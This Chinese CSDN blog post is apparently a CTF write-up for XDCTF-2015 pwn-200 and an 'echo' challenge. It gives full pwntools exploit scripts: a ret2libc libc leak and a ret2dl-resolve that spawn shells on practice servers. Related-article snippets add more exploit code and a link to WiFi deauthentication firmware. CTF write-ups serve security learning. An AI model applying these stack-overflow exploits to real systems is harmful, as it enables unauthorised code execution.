XDCTF-2015 pwn-200 backdoorctf-2015 echo

最新推荐文章于 2023-03-17 14:06:29 发布
最新推荐文章于 2023-03-17 14:06:29 发布
阅读量670 收藏
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/90299418
版权

XDCTF-2015 pwn-200

简单的泄露基址  这里就不多讲了

#!/usr/bin/python2
# -*- coding:utf-8 -*-

from pwn import *

context.log_level="debug"
#io=remote("111.198.29.45",32529)
io=process("./pwn")
elf=ELF("./pwn")
libc=ELF("./libc6_2.23_386.so")
start_addr=0x080483D0
if __name__=='__main__':
	io.recvuntil("Welcome to XDCTF2015~!\n")
	payload='a'*0x70+p32(elf.plt['write'])+p32(start_addr)+p32(1)+p32(elf.got['write'])+p32(4)
	#gdb.attach(io)
	io.sendline(payload)
	write_addr=u32(io.recv(4))
	print hex(write_addr)
	system_addr=write_addr-libc.sym["write"]+libc.sym['system']
	print hex(system_addr)
	io.recvuntil("Welcome to XDCTF2015~!\n")
	system_bin_addr=libc.search("/bin/sh\x00").next()+write_addr-libc.sym["write"]
	print hex(system_bin_addr)
	payload='a'*0x70+p32(system_addr)+p32(0)+p32(system_bin_addr)
	io.sendline(payload)
	io.interactive()
	io.close()

寻找到的 字符串 忘记加了 基址  差点debug半天

echo

这个题 按照以前别人的题解是不行的 一开始 我以为那个函数很简单  然后确实不行

然后 我知道了攻防世界 flag 没有 .txt啊

那就只能换个思路  伪造重定位表 直接搞 别人的库就行

from pwn import *
from roputils import *

context.log_level='debug'
fun_addr=0x0804854d
#io=process('./echo')
io=remote('111.198.29.45',34025)
offset=0x3e
rop=ROP('./echo')
bss_addr=rop.section('.bss')

pay=rop.fill(offset)
pay+=rop.call('gets',bss_addr)
pay+=rop.dl_resolve_call(bss_addr+20,bss_addr)

io.sendline(pay)
rop=ROP('./echo')
pay='/bin/sh\x00'
pay+=rop.fill(20,pay)
pay+=rop.dl_resolve_data(bss_addr+20,'system')


io.sendline(pay)
io.interactive()

 

 

pipixia233333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
xdctf-pwn200-附件资源
03-02
xdctf-pwn200-附件资源
[BUUCTF-pwn]——xdctf2015_pwn200
Y_peak的博客
03-17 267
[BUUCTF-pwn]——xdctf2015_pwn200 一个简单的ret2libc的题目, 前面写了不少了这里只给exp了 exploit from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',27025) elf = ELF('./bof') write_plt = elf.plt['write'] write_got = elf.got['write'] main = elf.symbols['main']
[BUUCTF]PWN——xdctf2015_pwn200
mcmuyanga的博客
11-11 1119
xdctf2015_pwn200 附件 步骤 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入,习惯性的检索程序里的字符串,没有发现什么铭感的地方,直接看main函数 vuln函数 参数buf存在溢出漏洞,由于开启了nx,没有可以直接利用的后门,这边使用ret2libc的方法 利用过程: 先用write函数泄露libc版本 payload='a'*(0x6c+4) #溢出到ret payload+=p32(wri
xdctf2015_pwn200
、moddemod
07-18 281
exp from pwn import * from LibcSearcher import * context.log_level = 'debug' proc_name = './bof' # p = process(proc_name) p = remote('node3.buuoj.cn', 25483) elf = ELF(proc_name) main_addr = elf.sym['main'] write_plt = elf.plt['write'] write_got = elf.go.
XDCTF2015 PWN200
Bill
03-01 1731
XDCTF 2015 PWN200 一. 源码(自己敲出来的) #include <stdio.h> #include <unistd.h> #include <string.h> int vuln(){ char buf[80]; setbuf(stdin, buf); return read(0, buf, 256)...
(攻防世界)(XDCTF-2015pwn200
PLpa的博客
07-13 2205
这一题和JarvisOJ中的level4简直不要太像了,只是改变了几个地址,改变了溢出点。 既然前面已经讲解了,这里就不再重复讲了,详细解法请看链接:https://blog.csdn.net/qq_43986365/article/details/95081996 完整exp如下: #! /usr/bin/env python from pwn import * p=remote('111.19...
BUUCTF xdctf2015_pwn200
qq_51821131的博客
10-05 1621
xdctf2015_pwn200 检查一下保护 拖进ida看看 存在明显栈溢出,但是没有system和binsh 但是可以通过泄露,找到地址,并拿到shell from pwn import * from LibcSearcher import * p=remote('node4.buuoj.cn',26340) #context.terminal = ['tmux', 'splitw', '-h'] elf=ELF('./bof') read_got=elf.got['read'] write_pl
Bugku S3 AWD排位赛-9 pwn二进制
最新发布
08-27
Bugku S3 AWD排位赛-9 pwn二进制
Backdoor-CTF-Crypto-400.rar
09-30
Backdoor-CTF-Crypto-400.rar
xdctf2015前20名writeup
10-07
2015xdctf前20名的writeup,绝对不坑
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
pwn200 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列21
重新启程
12-25 1327
题目地址:pwn-200 不知不觉已经到了高级进阶区的第十题了,攻防世界设计的学习过程,确实降低了学习曲线的陡峭程度。 废话不说,看看题目先 看一下难度星级陡然提升到5颗星,心里是不是有点懵逼!哈哈 先看看保护机制: [*] '/ctf/work/python/pwn200/9c6084f8a3b2473e8a9e9815099bfec5' Arch: i386-32-...
CTF实战26 CTF题目练习和讲解四
qq_53058639的博客
03-17 1961
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。不过我们这个水平也就算个渗透测试工程师,也就只能做个基础的安全服务,而这个领域还有很多业务,像攻防演练、等保测评、风险评估等,我们的能力根本不够看。最后网站开发知识多少也要了解点,不过别紧张,只是学习基础知识。
buuctf-pwn write-ups (6)
CoLin的pwn小屋
06-24 1139
buuctf-pwn 047~053题,重点关注第53题的C++ pwn
Pwn-高阶ROP-[栈溢出]/篇3
m0_52343643的博客
05-11 1359
大概调用过程: 也就是我们这里先调用了write函数的plt表项触发了_dl_runtime_resolve函数(会push linkmap)之后会先到.rel.plt段,通过plt中给的push <偏移>在.rel.plt段中找到偏移处对应函数的重定位表项,再通过该表项的r_info(一个偏移量),找到.dynsym段中对应偏移量函数的符号表项,又通过该符号表项的st_name(也是一个偏移量)在.dynstr段找到对应的字符串,最后就会通过这个字符串(函数名)来调用该函数。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值